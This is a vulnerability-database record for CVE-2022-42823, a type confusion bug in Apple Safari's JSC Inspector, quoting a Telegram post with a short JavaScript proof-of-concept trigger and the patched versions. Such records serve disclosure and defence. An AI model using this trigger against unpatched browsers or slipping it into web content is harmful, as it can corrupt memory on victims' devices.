{"uuid": "675a7675-8d6d-4acc-8425-0d22800cbd3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-42823", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1894", "content": "\ud83d\udd25\ud83d\udd25\ud83d\udd25Type confusion vulnerability(CVE-2022-42823) exists in the Apple Safari JSC Inspector(Root Cause Analysis + PoC).\n\nA Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.\n\nPoC:\n\n    let object = {};\n    Object.prototype.__defineSetter__('type', function() {\n        object.x = {};\n        object[0] = object.x;\n    });\n\n\n\ud83d\udee1Fixed in: macOS 13, tvOS 16.1, iOS 16.1 &amp; iPadOS 16, Safari 16.1, watchOS 9.1.", "creation_timestamp": "2022-12-20T06:02:36.000000Z"}